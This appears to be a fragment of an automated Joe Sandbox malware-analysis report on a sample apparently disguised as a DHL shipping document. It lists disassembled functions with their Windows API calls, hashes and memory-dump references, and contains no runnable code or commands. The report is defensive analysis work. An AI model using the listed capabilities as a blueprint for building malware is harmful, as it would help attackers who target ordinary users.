                                                                                            • Opcode ID: 05c6ac80fd10a71a1186d3d0505fb2d1ad8f45789226cd8f712e997f4d931046
                                                                                            • Instruction ID: 0340783ddb6af0e60283a1511d616139ed0aeb9fe2ced9dbd037f3b31dbc22e3
                                                                                            • Opcode Fuzzy Hash: 05c6ac80fd10a71a1186d3d0505fb2d1ad8f45789226cd8f712e997f4d931046
                                                                                            • Instruction Fuzzy Hash: 3FD163716047119FCB04EF29D480A2ABBE1FF89724F188859F889DB361DB31ED45CB92
                                                                                            Function 0088175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00880FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00880FCA
                                                                                              • Part of subcall function 00880FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00880FD6
                                                                                              • Part of subcall function 00880FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00880FE5
                                                                                              • Part of subcall function 00880FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00880FEC
                                                                                              • Part of subcall function 00880FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00881002
                                                                                            • GetLengthSid.ADVAPI32(?,00000000,00881335), ref: 008817AE
                                                                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 008817BA
                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 008817C1
                                                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 008817DA
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00881335), ref: 008817EE
                                                                                            • HeapFree.KERNEL32(00000000), ref: 008817F5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                            • String ID:
                                                                                            • API String ID: 3008561057-0
                                                                                            • Opcode ID: 209dfce4b095cf8d7015ec141ab7e8f18e3d76521ea5a0c7f20ac9163339277e
                                                                                            • Instruction ID: 7e1cbbcc0549398b99f05fa2dca03c946694d4f4af566679eb82739fc2c16a65
                                                                                            • Opcode Fuzzy Hash: 209dfce4b095cf8d7015ec141ab7e8f18e3d76521ea5a0c7f20ac9163339277e
                                                                                            • Instruction Fuzzy Hash: F6119772600205EBDF10AFA8DC49BAE7BADFB41359F104119F481E7214CB36A946CB60
                                                                                            Function 008814CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 008814FF
                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00881506
                                                                                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00881515
                                                                                            • CloseHandle.KERNEL32(00000004), ref: 00881520
                                                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0088154F
                                                                                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 00881563
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                            • String ID:
                                                                                            • API String ID: 1413079979-0
                                                                                            • Opcode ID: a3440a150f9c49c30348fe196e8f698e6800a444f14ea2bb9814169c07f208c3
                                                                                            • Instruction ID: 101fac8515ea499087dda2a0805f8c3358dd6c704a38f0392c8f327d49ef7469
                                                                                            • Opcode Fuzzy Hash: a3440a150f9c49c30348fe196e8f698e6800a444f14ea2bb9814169c07f208c3
                                                                                            • Instruction Fuzzy Hash: E611567250420DABDF119FA8ED49FDE7BAEFF48708F044124FA05A2160C7718E62DB60
                                                                                            Function 00843382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(?,?,00843379,00842FE5), ref: 00843390
                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0084339E
                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 008433B7
                                                                                            • SetLastError.KERNEL32(00000000,?,00843379,00842FE5), ref: 00843409
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                            • String ID:
                                                                                            • API String ID: 3852720340-0
                                                                                            • Opcode ID: 1ac824af85e5c08c5688cc51c6a39651cf766b62cc88b12755ac4fee8d8e4c99
                                                                                            • Instruction ID: c79fc6acced7ef97e874ba0b2653f08f5d4323470b4c803ad26be14959dd2964
                                                                                            • Opcode Fuzzy Hash: 1ac824af85e5c08c5688cc51c6a39651cf766b62cc88b12755ac4fee8d8e4c99
                                                                                            • Instruction Fuzzy Hash: 6501F733A0972ABFA6292B787CC5A672F94FB257797200329F420C53F1FF114E026544
                                                                                            Function 00852D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(?,?,00855686,00863CD6,?,00000000,?,00855B6A,?,?,?,?,?,0084E6D1,?,008E8A48), ref: 00852D78
                                                                                            • _free.LIBCMT ref: 00852DAB
                                                                                            • _free.LIBCMT ref: 00852DD3
                                                                                            • SetLastError.KERNEL32(00000000,?,?,?,?,0084E6D1,?,008E8A48,00000010,00824F4A,?,?,00000000,00863CD6), ref: 00852DE0
                                                                                            • SetLastError.KERNEL32(00000000,?,?,?,?,0084E6D1,?,008E8A48,00000010,00824F4A,?,?,00000000,00863CD6), ref: 00852DEC
                                                                                            • _abort.LIBCMT ref: 00852DF2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$_free$_abort
                                                                                            • String ID:
                                                                                            • API String ID: 3160817290-0
                                                                                            • Opcode ID: f7dbad02c671075c15b0b11fefdcbe4726c42be1400b73bc81907134757148ff
                                                                                            • Instruction ID: f5bb3f9ab0246e1b44e5afd211f53b67c75a94c3ac009a9af80f1b782852c155
                                                                                            • Opcode Fuzzy Hash: f7dbad02c671075c15b0b11fefdcbe4726c42be1400b73bc81907134757148ff
                                                                                            • Instruction Fuzzy Hash: 3CF0A432544A046BC212373CAC06E5A2A69FBC37A7F244519FC24E2292EF24880E4162
                                                                                            Function 008B8A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00839639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00839693
                                                                                              • Part of subcall function 00839639: SelectObject.GDI32(?,00000000), ref: 008396A2
                                                                                              • Part of subcall function 00839639: BeginPath.GDI32(?), ref: 008396B9
                                                                                              • Part of subcall function 00839639: SelectObject.GDI32(?,00000000), ref: 008396E2
                                                                                            • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 008B8A4E
                                                                                            • LineTo.GDI32(?,00000003,00000000), ref: 008B8A62
                                                                                            • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 008B8A70
                                                                                            • LineTo.GDI32(?,00000000,00000003), ref: 008B8A80
                                                                                            • EndPath.GDI32(?), ref: 008B8A90
                                                                                            • StrokePath.GDI32(?), ref: 008B8AA0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                            • String ID:
                                                                                            • API String ID: 43455801-0
                                                                                            • Opcode ID: ced089823e5619f5972ec0a9a21f46284766c1e0c68f43d5192c56075fb5afe8
                                                                                            • Instruction ID: 8dbaf112088da70ffd64852db0c06739dfe8db1812a40728f8b103431a2c4a07
                                                                                            • Opcode Fuzzy Hash: ced089823e5619f5972ec0a9a21f46284766c1e0c68f43d5192c56075fb5afe8
                                                                                            • Instruction Fuzzy Hash: 03110576400119FFEF129F94DC88EAA7F6CFB08390F008122FA599A1A1D7719D55DFA0
                                                                                            Function 008851FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDC.USER32(00000000), ref: 00885218
                                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 00885229
                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00885230
                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00885238
                                                                                            • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0088524F
                                                                                            • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00885261
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CapsDevice$Release
                                                                                            • String ID:
                                                                                            • API String ID: 1035833867-0
                                                                                            • Opcode ID: abc2ed9751a64cc071a278bfa05790d414bf938c2ff083cd0ec7708b9a5fef93
                                                                                            • Instruction ID: de700759f9412719621b7ab873a3f0a6d641980281246608eb8b15ef99683359
                                                                                            • Opcode Fuzzy Hash: abc2ed9751a64cc071a278bfa05790d414bf938c2ff083cd0ec7708b9a5fef93
                                                                                            • Instruction Fuzzy Hash: A1016275E40718BBEB10ABAA9C49E5EBFB8FF48751F044165FA04E7291DA709C00CFA0
                                                                                            Function 00821BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00821BF4
                                                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00821BFC
                                                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00821C07
                                                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00821C12
                                                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 00821C1A
                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00821C22
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Virtual
                                                                                            • String ID:
                                                                                            • API String ID: 4278518827-0
                                                                                            • Opcode ID: 6e7c39a2687ec14d8c2d81263f08c6392070172a180d88fa738f2bfb85848607
                                                                                            • Instruction ID: be596a76f7549e4a8ab4e39f15ad1a29e936905b34182a58a4acc5f0ce722efc
                                                                                            • Opcode Fuzzy Hash: 6e7c39a2687ec14d8c2d81263f08c6392070172a180d88fa738f2bfb85848607
                                                                                            • Instruction Fuzzy Hash: 3B0167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5
                                                                                            Function 0088EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0088EB30
                                                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0088EB46
                                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 0088EB55
                                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0088EB64
                                                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0088EB6E
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0088EB75
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                            • String ID:
                                                                                            • API String ID: 839392675-0
                                                                                            • Opcode ID: 4cafdfdc92ee2ef8e28a4a2baf0ded3777bb1fc938e33b7bc249d22e959e5467
                                                                                            • Instruction ID: 8f7c097e189b62b045c58b611461e93eca7814aa85447e3519cdd6827ae71914
                                                                                            • Opcode Fuzzy Hash: 4cafdfdc92ee2ef8e28a4a2baf0ded3777bb1fc938e33b7bc249d22e959e5467
                                                                                            • Instruction Fuzzy Hash: BCF01772240158BBE6215B629C0EEEB7B7CFBCBB11F000269FA11E1191A6A05A0186B5
                                                                                            Function 00877439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetClientRect.USER32(?), ref: 00877452
                                                                                            • SendMessageW.USER32(?,00001328,00000000,?), ref: 00877469
                                                                                            • GetWindowDC.USER32(?), ref: 00877475
                                                                                            • GetPixel.GDI32(00000000,?,?), ref: 00877484
                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00877496
                                                                                            • GetSysColor.USER32(00000005), ref: 008774B0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                            • String ID:
                                                                                            • API String ID: 272304278-0
                                                                                            • Opcode ID: 7aacc2dca4cfe15daccdfeca4a7b507fa30a7b9e29f577bcf1a5b0a8c9923392
                                                                                            • Instruction ID: 6cac793bd4000f6d131ed6bf719b371d673d1d95e8162072d32d71e6f68f849d
                                                                                            • Opcode Fuzzy Hash: 7aacc2dca4cfe15daccdfeca4a7b507fa30a7b9e29f577bcf1a5b0a8c9923392
                                                                                            • Instruction Fuzzy Hash: 89014B31400219EFDB515F64DC08FAA7BB5FB04315F514264FA19A21A1CB315E51EB50
                                                                                            Function 00881874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0088187F
                                                                                            • UnloadUserProfile.USERENV(?,?), ref: 0088188B
                                                                                            • CloseHandle.KERNEL32(?), ref: 00881894
                                                                                            • CloseHandle.KERNEL32(?), ref: 0088189C
                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 008818A5
                                                                                            • HeapFree.KERNEL32(00000000), ref: 008818AC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                            • String ID:
                                                                                            • API String ID: 146765662-0
                                                                                            • Opcode ID: c1d0dda42be1e202b89db95ea7d9e018747eb0d5bcee55d27c9ae3819ca45ae7
                                                                                            • Instruction ID: ded2cdadd5451f97da8a292d4e79c36f6238d6ec96ab62a2126c4aad648fb3c2
                                                                                            • Opcode Fuzzy Hash: c1d0dda42be1e202b89db95ea7d9e018747eb0d5bcee55d27c9ae3819ca45ae7
                                                                                            • Instruction Fuzzy Hash: A9E0E576004101BBDB015FA9ED0C90AFF79FF49B22B508321F22591170CB329420DF60
                                                                                            Function 0088C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00827620: _wcslen.LIBCMT ref: 00827625
                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0088C6EE
                                                                                            • _wcslen.LIBCMT ref: 0088C735
                                                                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0088C79C
                                                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0088C7CA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ItemMenu$Info_wcslen$Default
                                                                                            • String ID: 0
                                                                                            • API String ID: 1227352736-4108050209
                                                                                            • Opcode ID: db71313d762807a674420c52c5b188dc06a7d8d34c03236f352e077794a8caf1
                                                                                            • Instruction ID: 6cf86d6b907520d2f0a32eab484ac535b95ac772b964c6428cc6933facf56f1e
                                                                                            • Opcode Fuzzy Hash: db71313d762807a674420c52c5b188dc06a7d8d34c03236f352e077794a8caf1
                                                                                            • Instruction Fuzzy Hash: B051CE716143019BD724FF2CC885A6B77E8FF99314F040A2DFA95D31A9EB70D9048BA2
                                                                                            Function 008AAD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 008AAEA3
                                                                                              • Part of subcall function 00827620: _wcslen.LIBCMT ref: 00827625
                                                                                            • GetProcessId.KERNEL32(00000000), ref: 008AAF38
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 008AAF67
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                            • String ID: <$@
                                                                                            • API String ID: 146682121-1426351568
                                                                                            • Opcode ID: eaf4b1943bfbc9aaae6c954473344fc6345d9abc04cbe962142a4499c1bf2337
                                                                                            • Instruction ID: cab932fe531ee9f74e33c9a75e33bcbc1f41299ee897e1b082d982f70c18c763
                                                                                            • Opcode Fuzzy Hash: eaf4b1943bfbc9aaae6c954473344fc6345d9abc04cbe962142a4499c1bf2337
                                                                                            • Instruction Fuzzy Hash: D0716A70A00219DFDB18DF58D484A9EBBF0FF09310F048499E856ABB52CB74ED81CB92
                                                                                            Function 0088719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00887206
                                                                                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0088723C
                                                                                            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0088724D
                                                                                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 008872CF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                            • String ID: DllGetClassObject
                                                                                            • API String ID: 753597075-1075368562
                                                                                            • Opcode ID: 306a00885446eef4dc1f051c14614783e20363ea8bb9ebc5abd506c4415613bb
                                                                                            • Instruction ID: aef0593f6160376237d1ea6d4e88ccf0b5f588515e41a7b10fe8545d45fc5e84
                                                                                            • Opcode Fuzzy Hash: 306a00885446eef4dc1f051c14614783e20363ea8bb9ebc5abd506c4415613bb
                                                                                            • Instruction Fuzzy Hash: D3416F71A04208EFDB15DF54C884A9A7BB9FF45314F2480A9BD0AEF21AD7B1D944CBA0
                                                                                            Function 008B3D7C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008B3E35
                                                                                            • IsMenu.USER32(?), ref: 008B3E4A
                                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 008B3E92
                                                                                            • DrawMenuBar.USER32 ref: 008B3EA5
                                                                                            Strings
                                                                                            Memory Dump Source
